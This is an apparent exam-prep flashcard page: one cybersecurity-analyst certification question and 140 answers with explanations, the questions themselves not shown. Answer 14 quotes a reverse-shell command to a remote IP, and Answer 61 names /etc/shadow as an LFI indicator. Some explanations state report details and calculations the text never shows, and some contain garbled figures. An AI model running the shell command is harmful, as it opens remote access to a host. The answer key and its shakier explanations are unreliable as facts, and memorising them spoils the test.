examtopics.com Flashcards

Question

A security alert was triggered when an end user tried to access a website that is not allowed per organizational policy. Since the action is considered a terminable offense, the SOC analyst collects the authentication logs, web logs, and temporary files, reflecting the web searches from the user's workstation, to build the case for the investigation. Which of the following is the best way to ensure that the investigation complies with HR or privacy policies? **A.** Create a timeline of events detailing the date stamps, user account hostname and IP information associated with the activities. **B.** Ensure that the case details do not reflect any user-identifiable information, password protect the evidence and restrict access to personnel related to the investigation. **C.** Create a code name for the investigation in the ticketing system so that all personnel with access will not be able to easily identify the case as an HR-related investigation. **D.** Notify the SOC manager for awareness after confirmation that the activity was intentional.

Answer 1

**B.** Ensure that the case details do not reflect any user-identifiable information Password protect the evidence and restrict access to personnel related to the investigation.

Answer 2

A. Agree on the goals and objectives of the plan.

Answer 3

**C.** Validation.

Answer 4

**C.** New account introduced. The endpoint log entry shows that a new account named “admin” has been created on a Windows system with a local group membership of “Administrators”. This indicates that a new account has been introduced on the system with administrative privileges. This could be a sign of malicious activity, such as privilege escalation or backdoor creation, by an attacker who has compromised the system.

Answer 5

**D.** Single pane of glass.

Answer 6

E. p4wnp1_aloa.lan (192.168.86.56) The analyst should look at p4wnp1_aloa.lan (192.168.86.56) first, as this is the most suspicious device on the network. https://github.com/RoganDawes/P4wnP1_aloa

Answer 7

B. Secure the scene. The first thing that must be done when starting an investigation is to secure the scene. Securing the scene involves isolating and protecting the area where the incident occurred, as well as any potential evidence or witnesses. Securing the scene can help prevent any tampering, contamination, or destruction of evidence, as well as any interference or obstruction of the investigation.

Answer 8

A. The lead should review what is documented in the incident response policy or plan. The incident response policy or plan is a document that defines the roles and responsibilities, procedures and processes, communication and escalation protocols, and reporting and documentation requirements for handling security incidents. The lead should review what is documented in the incident response policy or plan to determine who should be communicated with and when during a security incident, as well as what information should be shared and how. The incident response policy or plan should also be aligned with the organizational policies and legal obligations regarding incident notification and disclosure.

Answer 9

C. Risk assessment.

Answer 10

A. Beaconing.

Answer 11

**C.** Change the display filter to ftp-data and follow the TCP streams. By changing the display filter to "ftp-data" and then following the TCP streams, the analyst can access and view the entire data transfer, which includes the contents of the downloaded files. This method allows you to reconstruct and view the files being transferred over FTP.

Answer 12

A. Command and control. Command and control (C2) is a phase of the Cyber Kill Chain that involves the adversary attempting to establish communication with a successfully exploited target. C2 enables the adversary to remotely control or manipulate the target system or network using various methods, such as malware callbacks, backdoors, botnets, or covert channels. C2 allows the adversary to maintain persistence, exfiltrate data, execute commands, deliver payloads, or spread to other systems or networks.

Answer 13

B. Agent-based Agent-based vulnerability scanning involves deploying scanning agents on the target systems. These agents perform the scanning locally on each system, reducing the need for extensive network traffic because the scanning is distributed. This approach is particularly well-suited for environments with dynamic IP addresses and remote workers because it doesn't rely on centralized scanning servers or frequent network scans.

Answer 14

B. Reverse shell A reverse shell is a type of shell access that allows a remote user to execute commands on a target system or network by reversing the normal direction of communication. A reverse shell is usually created by running a malicious script or program on the target system that connects back to the remote user’s system and opens a shell session. A reverse shell can bypass firewalls or other security controls that block incoming connections, as it uses an outgoing connection initiated by the target system. In this case, the security analyst has detected an exploit attempt containing the following command: sh -i >& /dev/udp/10.1.1.1/4821 0>$l This command is a shell script that creates a reverse shell connection from the target system to the remote user’s system at IP address 10.1.1.1 and port 4821 using UDP protocol.

Answer 15

B. Weaponization Weaponization in the context of vulnerability assessment and the Common Vulnerability Scoring System (CVSS) refers to the development and availability of tools, exploits, or malware that can take advantage of a vulnerability. When a widely available exploit, such as one used to deliver ransomware, becomes accessible to attackers, it significantly increases the severity of the vulnerability. This is because the exploitability of the vulnerability is heightened, leading to a higher CVSS score.

Answer 16

D. 54.74.110.228 The system that should be prioritized for patching first is 54.74.110.228, as it has the highest number and severity of vulnerabilities among the four systems listed in the vulnerability report. According to the report, this system has 12 vulnerabilities, with 8 critical, 3 high, and 1 medium severity ratings. The critical vulnerabilities include CVE-2019-0708 (BlueKeep), CVE-2019-1182 (DejaBlue), CVE-2017-0144 (EternalBlue), and CVE-2017-0145 (EternalRomance), which are all remote code execution vulnerabilities that can allow an attacker to compromise the system without any user interaction or authentication. These vulnerabilities pose a high risk to the system and should be patched as soon as possible.

Answer 17

C. Agent-based scanning

Answer 18

D. function x() { info=$(traceroute -m 40 $1 | awk ‘END{print $1}’) && echo "$1 | $info" } This shell function uses traceroute to trace the route packets take to reach the destination specified by $1. The -m 40 option specifies a maximum of 40 hops for the trace. The awk 'END{print $1}' part extracts the final hop from the traceroute output, and then the function echoes the destination and the info.

Answer 19

B. Improve employee training and awareness.

Answer 20

A. Determine the sophistication of the audience that the report is meant for.

Answer 21

A. Upload the binary to an air gapped sandbox for analysis.

Answer 22

C. SOAR SOAR stands for security orchestration, automation, and response, which is a term that describes a set of tools, technologies, or platforms that can help streamline, standardize, and automate security operations and incident response processes and tasks. SOAR can help minimize human engagement and aid in process improvement in security operations by reducing manual work, human errors, response time, or complexity. SOAR can also help enhance collaboration, coordination, efficiency, or effectiveness of security operations and incident response teams.

Answer 23

**A.** Identify any improvements or changes in the incident response plan or procedures. This helps in strengthening the organization's security posture and ensuring a more effective response in the future.

Answer 24

**A.** Single pane of glass A single pane of glass provides a unified dashboard and workflow for managing multiple feeds, data sources, and tools within one interface. This allows streamlining threat intel from disparate portals into one centralized view for improved efficiency and visibility.

Answer 25

**A.** MITRE ATT&CK MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) is a widely used framework that provides a comprehensive matrix of known Tactics, Techniques, and Procedures (TTPs) used by various adversaries. It allows security analysts to compare and map the TTPs observed in their environment to those associated with known threat actors and groups. By using ATT&CK, analysts can gain insights into which adversaries may be responsible for specific incidents based on their TTPs, aiding in threat intelligence analysis and incident response.

Answer 26

**A.** Eradication Eradication involves the process of identifying and removing the root cause or vulnerability that led to the incident. In this case, the analyst has isolated the vulnerability and is actively removing it from the system. This step is crucial to prevent further exploitation of the same vulnerability and to ensure the incident does not recur.

Answer 27

**D.** Perform no action until HR or legal counsel advises on next steps. Before any technical actions are taken, it is crucial to involve HR and legal counsel to assess the situation, understand the legal implications of Joe's actions, and determine the appropriate course. This ensures that any response is in compliance with employment laws and company policies.

Answer 28

**A.** Reduce the administrator and privileged access accounts. Zero trust is a security framework that assumes that threats exist both inside and outside the network. It emphasizes the principle of "least privilege," which means that users and systems should only have the minimum level of access necessary to perform their tasks.

Answer 29

**A.** Clone the virtual server for forensic analysis. Cloning the virtual server allows the analyst to capture a snapshot of the system as it is, including all current data, configurations, and state. This cloned version can be analyzed in detail without affecting the integrity of the original server, which is crucial for any potential legal proceedings and for understanding the scope and details of the attack.

Answer 30

**A.** C2 beaconing activity. The most likely explanation for this traffic pattern is C2 beaconing activity. C2 stands for command and control, which is a phase of the Cyber Kill Chain that involves the adversary attempting to establish communication with a successfully exploited target. C2 beaconing activity is a type of network traffic that indicates a compromised system is sending periodic messages or signals to an attacker’s system using various protocols, such as HTTP(S), DNS, ICMP, or UDP. C2 beaconing activity can enable the attacker to remotely control or manipulate the target system or network using various methods, such as malware callbacks, backdoors, botnets, or covert channels.

Answer 31

**D.** All new employees must sign a user agreement to acknowledge the company security policy. Requiring new employees to sign a user agreement is a common and effective practice in organizations. It ensures that employees have acknowledged and agreed to adhere to the company's security policies, including the prohibition of personal devices.

Answer 32

**A.** Information sharing organization. Information Sharing and Analysis Centers (ISACs) or other similar organizations are dedicated to sharing information about threats and vulnerabilities in specific sectors, including critical infrastructure and defense. Given the company's role in the supply chain for a fighter jet, it would likely be a part of an industry-specific ISAC focused on defense or critical infrastructure. These organizations often have access to high-quality, vetted intelligence, including classified or sensitive information that may not be available through other channels. They also enable timely and relevant information sharing among members.

Answer 33

**C.** To identify areas of improvement in the incident response process. Lessons learned are a critical component of the incident response process. They serve the purpose of reflecting on what went well and what could have been done better during the incident response.

Answer 34

**B.** TSpirit: Cobain: Yes - Grohl: Yes - Novo: Yes - Smear: No - Channing: No

Answer 35

**C.** Insider threat. An insider threat refers to a person within an organization (in this case, the user) who poses a threat to the organization's security. Insider threats can be unintentional, such as when a user unknowingly downloads and spreads malware.

Answer 36

**A.** Take a snapshot of the compromised server and verify its integrity. The next action that the CSIRT should conduct after isolating the compromised server from the network is to take a snapshot of the compromised server and verify its integrity. Taking a snapshot and verifying its integrity can help preserve and protect any evidence or information related to the incident, as well as prevent any tampering, contamination, or destruction of evidence.

Answer 37

**D.** Running processes

Answer 38

**C.** function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ”.in-addr” ’{print $1}’).origin.asn.cymru.com TXT +short } This function takes an IP address as an argument and performs two DNS lookups using the dig command. The first lookup uses the -x option to perform a reverse DNS lookup and get the hostname associated with the IP address. The second lookup uses the origin.asn.cymru.com domain to get the autonomous system number (ASN) and other information related to the IP address, such as the country code, registry, or allocation date. The function then prints the IP address and the ASN information, which can help identify any network addresses that belong to the same ASN or region.

Answer 39

B. function x() { info=$(geoiplookup $1) && echo “$1 | $info” } This function takes an IP address as an argument and uses the geoiplookup command to get the geographic location information associated with the IP address, such as the country name, country code, region, city, or latitude and longitude. The function then prints the IP address and the geographic location information, which can help identify any IP addresses that belong to the same country.

Answer 40

**D.** Perform proper sanitization on all fields. The first action that should be completed to remediate the findings is to perform proper sanitization on all fields. Performing proper sanitization on all fields can help address the most critical and common vulnerability found during the vulnerability assessment.

Answer 41

**B.** Determine what attack the odd characters are indicative of. In the context of reviewing web server logs, the most immediate and practical step is to investigate the nature of the odd characters in the request line. This involves understanding the patterns, syntax, and characteristics of these entries to determine if they are indicative of a particular attack or anomaly. Simply shutting down the network (option A) or notifying law enforcement (option D) without understanding the nature of the issue might be premature and could disrupt normal operations unnecessarily. Utilizing the correct attack framework (option C) may come into play after identifying the attack type, but the initial focus should be on understanding the nature of the odd characters to assess the potential threat.

Answer 42

**C.** Incident response plan.

Answer 43

**B.** Block the IP range of the scans at the network firewall. Option A, geo-blocking the offending country of origin, is not the best choice due to the negative impact, the possibility of evasion and the overly broad approach. Option B, blocking the IP range from scans at the network firewall, is the most appropriate as it is straightforward, effective, flexible, and strikes a better balance in addressing the specific issue without harming legitimate traffic. Therefore, the answer is B. In summary, option B is the most effective and balanced choice to mitigate the threat of network scanning activities originating from a country with which the company does not do business.

Answer 44

**A.** Limit user creation to administrators only.

Answer 45

**C.** Performing input validation before allowing submission.

Answer 46

**D.** Mean time to contain. Mean time to contain is the metric that the cybersecurity team lead should include in the weekly executive briefs, as it measures how long it takes to stop the spread of malware that enters the network. Mean time to contain is the average time it takes to isolate and neutralize an incident or a threat, such as malware, from the time it is detected. Mean time to contain is an important metric for evaluating the effectiveness and efficiency of the incident response process, as well as the potential impact and damage of the incident or threat. A lower mean time to contain indicates a faster and more successful response, which can reduce the risk and cost of the incident or threat. Mean time to contain can also be compared with other metrics, such as mean time to detect or mean time to remediate, to identify gaps or areas for improvement in the incident response process.

Answer 47

**A.** Update the system firmware and reimage the hardware.

Answer 48

**A.** High GPU utilization.

Answer 49

**C.** Legal department.

Answer 50

**B.** The vulnerability is network based. AV:N: vulnerability is network-based AC:L: attack complexity is low PR:N: privileges are not required to exploit the vulnerability UI:N: no user interaction required S:U: scope of the impact is unchanged (unchanged scope). C:H: confidentiality impact is high. I:H: integrity impact is high. A:H: availability impact is high.

Answer 51

**D.** 4 Question states the "company is primarily concerned with ensuring the accuracy of the data", or integrity in other words. Preserving the integrity of the data is important. So we will prioritize vulnerabilities that affect integrity (I in the CVSS 3.1 metrics) V1 - I:L means integrity risk is low V2 - I:L means integrity risk is low V3 - I:N means integrity risk is none V4 - I:H means integrity risk is high

Answer 52

**B.** brady

Answer 53

**A.** Generate a hash value and make a backup image.

Answer 54

**A.** To test possible incident scenarios and how to react properly. A tabletop exercise is a type of simulation exercise that involves testing possible incident scenarios and how to react properly, without actually performing any actions or using any resources. A tabletop exercise is usually conducted by a facilitator who presents a realistic scenario to a group of participants, such as a cyberattack, a natural disaster, or a data breach. The participants then discuss and evaluate their roles, responsibilities, plans, procedures, and policies for responding to the incident, as well as the potential impacts and outcomes. A tabletop exercise can help identify strengths and weaknesses in the incident response plan, improve communication and coordination among the stakeholders, raise awareness and preparedness for potential incidents, and provide feedback and recommendations for improvement.

Answer 55

**D.** The digital certificate on the web server was self-signed. A digital certificate is a document that contains the public key and identity information of a web server, and is signed by a trusted third-party authority called a certificate authority (CA). A digital certificate allows the web server to establish a secure connection with the clients using the HTTPS protocol, and also verifies the authenticity of the web server. A self-signed certificate is a digital certificate that is not signed by a CA, but by the web server itself. A self-signed certificate can cause issues with the website, as it may not be trusted by the clients or their browsers. Clients may receive warnings or errors when trying to access the website, indicating that the site could not be trusted or that the connection is not secure.

Answer 56

**A.** Log entry 1 This entry appears to contain a command injection attempt in the URL using Java's Runtime class.

Answer 57

**D.** Determine the asset value of each system.

Answer 58

**C.** A new program has been set to execute on system start.

Answer 59

**C.** The host is allowing insecure cipher suites. The output shows the result of running the ssl-enum-ciphers script with Nmap, which is a tool that can scan web servers for supported SSL/TLS cipher suites. Cipher suites are combinations of cryptographic algorithms that are used to establish secure communication between a client and a server. The output shows the cipher suites that are supported by the server, along with a letter grade (A through F) indicating the strength of the connection. The output also shows the least strength, which is the strength of the weakest cipher offered by the server. In this case, the least strength is F, which means that the server is allowing insecure cipher suites that are vulnerable to attacks or have been deprecated. For example, the output shows that the server supports SSLv3, which is an outdated and insecure protocol that is susceptible to the POODLE attack. The output also shows that the server supports RC4, which is a weak and broken stream cipher that should not be used. Therefore, the best description of the output is that the host is allowing insecure cipher suites. The other descriptions are not accurate, as they do not reflect what the output shows. The host is not up or responding is incorrect, as the output clearly shows that the host is up and responding to the scan. The host is running excessive cipher suites is incorrect, as the output does not indicate how many cipher suites the host is running, only which ones it supports. The Secure Shell port on this host is closed is incorrect, as the output does not show anything about port 22, which is the default port for Secure Shell (SSH). The output only shows information about port 443, which is the default port for HTTPS.

Answer 60

**A.** Update the system firmware and reimage the hardware. Updating the system firmware and reimaging the hardware is the best action to perform to remediate the infected device, as it helps to ensure that the device is restored to a clean and secure state and that any traces of malware are removed.

Answer 61

**A.** /etc/shadow /etc/shadow is the pattern that the security analyst can use to search the web server logs for evidence of exploitation of the LFI vulnerability that can be exploited to extract credentials from the underlying host. LFI stands for Local File Inclusion, which is a vulnerability that allows an attacker to include local files on the web server into the output of a web application. LFI can be exploited to extract sensitive information from the web server, such as configuration files, passwords, or source code. The /etc/shadow file is a file that stores the encrypted passwords of all users on a Linux system. If an attacker can exploit the LFI vulnerability to include this file into the web application output, they can obtain the credentials of the users on the web server. Therefore, the security analyst can look for /etc/shadow in the request line of the web server logs to see if any attacker has attempted or succeeded in exploiting the LFI vulnerability.

Answer 62

**D.** Cross-site scripting XSS is a type of web application attack that exploits the vulnerability of a web server or browser to execute malicious scripts or commands on the client-side. XSS attackers inject malicious code, such as JavaScript, VBScript, HTML, or CSS, into a web page or application that is viewed by other users. The malicious code can then access or manipulate the user’s session, cookies, browser history, or personal information, or perform actions on behalf of the user, such as stealing credentials, redirecting to phishing sites, or installing malware12 The line in the web server log shows an example of an XSS attack using VBScript. The attacker tried to insert an tag with a malicious SRC attribute that contains a VBScript code. The VBScript code is intended to display a message box with the text “test” when the user views the web page or application. This is a simple and harmless example of XSS, but it could be used to test the vulnerability of the web server or browser, or to launch more sophisticated and harmful attacks.

Answer 63

**B.** Deploy EDR on the web server and the database server to reduce the adversaries capabilities. **D.** Use micro segmentation to restrict connectivity to/from the web and database servers. Deploying EDR on the web server and the database server to reduce the adversaries capabilities and using micro segmentation to restrict connectivity to/from the web and database servers are two compensating controls that will help contain the adversary while meeting the other requirements. A compensating control is a security measure that is implemented to mitigate the risk of a vulnerability or an attack when the primary control is not feasible or effective. EDR stands for Endpoint Detection and Response, which is a tool that monitors endpoints for malicious activity and provides automated or manual response capabilities. EDR can help contain the adversary by detecting and blocking their actions, such as data exfiltration, lateral movement, privilege escalation, or command execution. Micro segmentation is a technique that divides a network into smaller segments based on policies and rules, and applies granular access controls to each segment. Micro segmentation can help contain the adversary by isolating the web and database servers from other parts of the network, and limiting the traffic that can flow between them.

Answer 64

**A.** SLA SLA (Service Level Agreement) is the best term to describe the document that defines the expectation to network customers that patching will only occur between 2:00 a.m. and 4:00 a.m., as it reflects the agreement between a service provider and a customer that specifies the services, quality, availability, and responsibilities that are agreed upon. An SLA is a common type of document that is used in various industries and contexts, such as IT, telecom, cloud computing, or outsourcing. An SLA typically includes metrics and indicators to measure the performance and quality of the service, such as uptime, response time, or resolution time. An SLA also defines the consequences or remedies for any breaches or failures of the service, such as penalties, refunds, or credits. An SLA can help to manage customer expectations, formalize communication, improve productivity, and strengthen relationships. The other terms are not as accurate as SLA, as they describe different types of documents or concepts. LOI (Letter of Intent) is a document that outlines the main terms and conditions of a proposed agreement between two or more parties, before a formal contract is signed. An LOI is usually non-binding and expresses the intention or interest of the parties to enter into a future agreement. An LOI can help to clarify the key points of a deal, facilitate negotiations, or demonstrate commitment. MOU (Memorandum of Understanding) is a document that describes a mutual agreement or cooperation between two or more parties, without creating any legal obligations or commitments. An MOU is usually more formal than an LOI, but less formal than a contract. An MOU can help to establish a common ground, define roles and responsibilities, or outline expectations and goals. KPI (Key Performance Indicator) is a concept that refers to a measurable value that demonstrates how effectively an organization or individual is achieving its key objectives or goals. A KPI is usually quantifiable and specific, such as revenue growth, customer satisfaction, or employee retention. A KPI can help to track progress, evaluate performance, or identify areas for improvement.

Answer 65

**C.** Agent-based scanning Agent-based scanning is a method that involves installing software agents on the target systems or networks that can perform local scans and report the results to a central server or console. Agent-based scanning can reduce the access to systems, as the agents do not require any credentials or permissions to scan the local system or network. Agent-based scanning can also provide the most accurate vulnerability scan results, as the agents can scan continuously or on-demand, regardless of the system or network status or location.

Answer 66

**C.** 23 **D.** 636 The output shows the results of a port scan, which is a technique used to identify open ports and services running on a network host. Port scanning can be used by attackers to discover potential vulnerabilities and exploit them, or by defenders to assess the security posture and configuration of their network devices. The output lists six ports that are open on the target host, along with the service name and version associated with each port. The service name indicates the type of application or protocol that is using the port, while the version indicates the specific release or update of the service. The service name and version can provide useful information for both attackers and defenders, as they can reveal the capabilities, features, and weaknesses of the service. Among the six ports listed, two are particularly risky and should be investigated further by the security team: port 23 and port 636. Port 23 is used by Telnet, which is an old and insecure protocol for remote login and command execution. Telnet does not encrypt any data transmitted over the network, including usernames and passwords, which makes it vulnerable to eavesdropping, interception, and modification by attackers. Telnet also has many known vulnerabilities that can allow attackers to gain unauthorized access, execute arbitrary commands, or cause denial-of-service attacks on the target host. Port 636 is used by LDAP over SSL/TLS (LDAPS), which is a protocol for accessing and modifying directory services over a secure connection. LDAPS encrypts the data exchanged between the client and the server using SSL/TLS certificates, which provide authentication, confidentiality, and integrity. However, LDAPS can also be vulnerable to attacks if the certificates are not properly configured, verified, or updated. For example, attackers can use self-signed or expired certificates to perform man-in-the-middle attacks, spoofing attacks, or certificate revocation attacks on LDAPS connections. Therefore, the security team should investigate further why port 23 and port 636 are open on the target host, and what services are running on them. The security team should also consider disabling or replacing these services with more secure alternatives, such as SSH for port 23 and StartTLS for port 6362.

Answer 67

**B.** Adversary emulation Adversary emulation is a technique that involves mimicking the tactics, techniques, and procedures (TTPs) of a specific threat actor or group to test the effectiveness of the security controls and incident response capabilities of an organization. Adversary emulation can help identify and address the gaps and weaknesses in the security posture of an organization, as well as improve the readiness and skills of the security team. Adversary emulation can also help measure the dwell time, which is the duration that a threat actor remains undetected inside the network. The other options are not the best techniques to meet the CISO’s goals. Vulnerability scanning (A) is a technique that involves scanning the network and systems for known vulnerabilities, but it does not simulate a real attack or test the incident response capabilities. Passive discovery (C) is a technique that involves collecting information about the network and systems without sending any packets or probes, but it does not identify or exploit any vulnerabilities or test the security controls. Bug bounty (D) is a program that involves rewarding external researchers or hackers for finding and reporting vulnerabilities in an organization’s systems or applications, but it does not focus on a specific threat actor or group.

Answer 68

C. host03 Host03 should be patched first, based on the metrics, as it has the highest risk score and the highest number of critical vulnerabilities. The risk score is calculated by multiplying the CVSS score by the exposure factor, which is the percentage of systems that are vulnerable to the exploit. Host03 has a risk score of 10 x 0.9 = 9, which is higher than any other host. Host03 also has 5 critical vulnerabilities, which are the most severe and urgent to fix, as they can allow remote code execution, privilege escalation, or data loss. The other hosts have lower risk scores and lower numbers of critical vulnerabilities, so they can be patched later.

Answer 69

C. function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ”.in-addr” ’{print $1}’).origin.asn.cymru.com TXT +short } The shell script function that could help identify possible network addresses from different source networks belonging to the same company and region is: function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ”.in-addr” ’{print $1}’).origin.asn.cymru.com TXT +short } This function takes an IP address as an argument and performs two DNS lookups using the dig command. The first lookup uses the -x option to perform a reverse DNS lookup and get the hostname associated with the IP address. The second lookup uses the origin.asn.cymru.com domain to get the autonomous system number (ASN) and other information related to the IP address, such as the country code, registry, or allocation date. The function then prints the IP address and the ASN information, which can help identify any network addresses that belong to the same ASN or region.

Answer 70

**B.** The vulnerability is network based. The vulnerability is network based is the correct attribute that describes this vulnerability, as it can be inferred from the CVSS string. CVSS stands for Common Vulnerability Scoring System, which is a framework that assigns numerical scores and ratings to vulnerabilities based on their characteristics and severity. The CVSS string consists of several metrics that define different aspects of the vulnerability, such as the attack vector, the attack complexity, the privileges required, the user interaction, the scope, and the impact on confidentiality, integrity and availability. The first metric in the CVSS string is the attack vector (AV), which indicates how the vulnerability can be exploited. The value of AV in this case is N, which stands for network. This means that the vulnerability can be exploited remotely over a network connection, without physical or logical access to the target system. Therefore, the vulnerability is network based.

Answer 71

A. Avoid Avoid is a risk management principle that describes the decision or action of not engaging in an activity or accepting a risk that is deemed too high or unacceptable. Avoiding a risk can eliminate the possibility or impact of the risk, as well as the need for any further risk management actions. In this case, the CISO decided the risk score would be too high and refused the software request. This indicates that the CISO selected the avoid principle for risk management.

Answer 72

**D.** Make a forensic image of the device and create a SHA1 hash. Making a forensic image of the device and creating a SHA1 hash is the best step to preserve evidence, as it creates an exact copy of the device’s data and verifies its integrity. A forensic image is a bit-by-bit copy of the device’s storage media, which preserves all the information on the device, including deleted or hidden files. A SHA1 hash is a cryptographic value that is calculated from the forensic image, which can be used to prove that the image has not been altered or tampered with. The other options are not as effective as making a forensic image and creating a SRA-I hash, as they may not capture all the relevant data, or they may not provide sufficient verification of the evidence’s authenticity.

Answer 73

**A.** Clone the virtual server for forensic analysis. The first action that the analyst should take in this case is to clone the virtual server for forensic analysis. Cloning the virtual server involves creating an exact copy or image of the server’s data and state at a specific point in time. Cloning the virtual server can help preserve and protect any evidence or information related to the security incident, as well as prevent any tampering, contamination, or destruction of evidence. Cloning the virtual server can also allow the analyst to safely analyze and investigate the incident without affecting the original server or its operations.

Answer 74

C. CVSS 3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Answer 75

**A.** Deploy a CASB and enable policy enforcement. A cloud access security broker (CASB) is a tool that can help reduce the risk of shadow IT in the enterprise by providing visibility and control over cloud applications and services. A CASB can enable policy enforcement by blocking unauthorized or risky cloud applications, enforcing data loss prevention rules, encrypting sensitive data, and detecting anomalous user behavior.

Answer 76

A. Increasing training and awareness for all staff. Increasing training and awareness for all staff is the best way to address the issue of employees being enticed to assist attackers by visiting specific websites and running downloaded files when prompted by phone calls. This issue is an example of social engineering, which is a technique that exploits human psychology and behavior to manipulate people into performing actions or divulging information that benefit the attackers. Social engineering can take many forms, such as phishing, vishing, baiting, quid pro quo, or impersonation. The best defense against social engineering is to educate and train the staff on how to recognize and avoid common social engineering tactics.

Answer 77

C. Use application security scanning as part of the pipeline for the CI/CD flow. Application security scanning is a process that involves testing and analyzing applications for security vulnerabilities, such as injection flaws, broken authentication, cross-site scripting, and insecure configuration. Application security scanning can help identify and fix security issues before they become exploitable by attackers. Using application security scanning as part of the pipeline for the continuous integration/continuous delivery (CI/CD) flow can help mitigate the problem of finding the same vulnerabilities in a critical application during security scanning. This is because application security scanning can be integrated into the development lifecycle and performed automatically and frequently as part of the CI/CD process.

Answer 78

C. DNS A distributed denial-of-service (DDoS) attack is a type of cyberattack that aims to overwhelm a target’s network or server with a large volume of traffic from multiple sources. A common technique for launching a DDoS attack is to compromise DNS servers, which are responsible for resolving domain names into IP addresses. By flooding DNS servers with malicious requests, attackers can disrupt the normal functioning of the internet and prevent users from accessing external SaaS resources.

Answer 79

D. Conduct regular code reviews using OWASP best practices. Conducting regular code reviews using OWASP best practices is the most effective action to reduce risks associated with the application development. Code reviews are a systematic examination of the source code of an application to detect and fix errors, vulnerabilities, and weaknesses that may compromise the security, functionality, or performance of the application. Code reviews can help to improve the quality and security of the code, as well as to identify and remediate common security risks, such as insufficient logging capabilities. OWASP (Open Web Application Security Project) is a global nonprofit organization that provides free and open resources, tools, standards, and best practices for web application security. OWASP best practices for logging include following a common logging format and approach, logging relevant security events and data, protecting log data from unauthorized access or modification, and using log analysis and monitoring tools to detect and respond to security incidents. By following OWASP best practices for logging, developers can ensure that their web applications have sufficient and effective logging capabilities that can help to prevent, detect, and mitigate security threats.

Answer 80

A. Vulnerability A

Answer 81

B. Replace the current MD5 with SHA-256. The vulnerability that the security analyst is able to exploit is a hash collision, which is a situation where two different files produce the same hash value. Hash collisions can allow an attacker to bypass the integrity or authentication checks that rely on hash values, and submit malicious files to the system. The web application uses MD5, which is a hashing algorithm that is known to be vulnerable to hash collisions. Therefore, the analyst should suggest replacing the current MD5 with SHA-256, which is a more secure and collision-resistant hashing algorithm. The other options are not the best suggestions to mitigate the vulnerability with the fewest changes to the current script and infrastructure. Deploying a WAF (web application firewall) to the front of the application (A) may help protect the web application from some common attacks, but it may not prevent hash collisions or detect malicious files. Deploying an antivirus application on the hosting system (C) may help scan and remove malicious files from the system, but it may not prevent hash collisions or block malicious files from being submitted. Replacing the MD5 with digital signatures (D) may help verify the authenticity and integrity of the files, but it may require significant changes to the current script and infrastructure, as digital signatures involve public-key cryptography and certificate authorities.

Answer 82

D. The MTTR decreases by 20%.

Answer 83

A. Chain of custody

Answer 84

A. VM_PRD_DB

Answer 85

C. Establish a chain of custody starting with the attorney's request.

Answer 86

A. OpenVAS

Answer 87

D. Identify the IP/hostname for the requests and look at the related activity.

Answer 88

C. Redis Server

Answer 89

D. Data exfiltration

Answer 90

B. Root cause analysis

Answer 91

D. MITRE ATT&CK

Answer 92

C. Group C

Answer 93

C. Harden systems by disabling or removing unnecessary services.

Answer 94

B. The scanner is running in active mode.

Answer 95

D. Encryption F. Access controls

Answer 96

A. Establish quarterly SDLC training on the top vulnerabilities for developers.

Answer 97

D. Transfer

Answer 98

B. Discovery scan

Answer 99

B. True negative

Answer 100

A. Credentialed scan

Answer 101

C. Unauthorized changes

Answer 102

D. great.skills

Answer 103

C. Review the steps that the previous analyst followed.

Answer 104

A. Compensating controls

Answer 105

D. Search for other mail users who have received the same file.

Answer 106

C. Mitigate

Answer 107

A. Mean time to detect.

Answer 108

B. Configure the servers to forward logs to a SIEM.

Answer 109

A. Perform a tabletop drill based on previously identified incident scenarios.

Answer 110

C. Quarantine the server.

Answer 111

B. Allowlisting

Answer 112

A. Header analysis

Answer 113

A. The message fails a DMARC check.

Answer 114

A. Data masking

Answer 115

A. 25 minutes

Answer 116

D. Deploy a scanner sensor on every segment and perform credentialed scans.

Answer 117

B. Password changes

Answer 118

C. Add data enrichment for IPs in the ingestion pipeline.

Answer 119

A. Integrate an IT service delivery ticketing system to track remediation and closure.

Answer 120

D. AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L - Base Score 6.5

Answer 121

A. Evaluate scoring fields, such as Spam Confidence Level and Bulk Complaint Level. F. Examine the SPF, DKIM, and DMARC fields from the original email.

Answer 122

C. tcpdump -n -r packets.pcap host [IP address]

Answer 123

A. A well-defined timeline of the events.

Answer 124

B. TCPDump

Answer 125

C. Check configurations to determine whether USB ports are enabled on company assets.

Answer 126

A. Implement segmentation with ACLs.

Answer 127

D. #!/bin/bash netstat -antp | grep 8080 >dev/null && echo "Malicious activity" || echo "OK"

Answer 128

C. Automation

Answer 129

D. The root cause analysis identifies the contributing items that facilitated the event.

Answer 130

A. Any discovered vulnerabilities will not be remediated.

Answer 131

C. Time synchronization

Answer 132

B. Decommission the proxy.

Answer 133

B. Passive scanning

Answer 134

B. Registry key values

Answer 135

D. A social engineering attack is underway.

Answer 136

D. Registry

Answer 137

C. Nation-state

Answer 138

C. Hard-coded credential

Answer 139

B. Execute commands through an unsecured service account.

Answer 140

D. Beaconing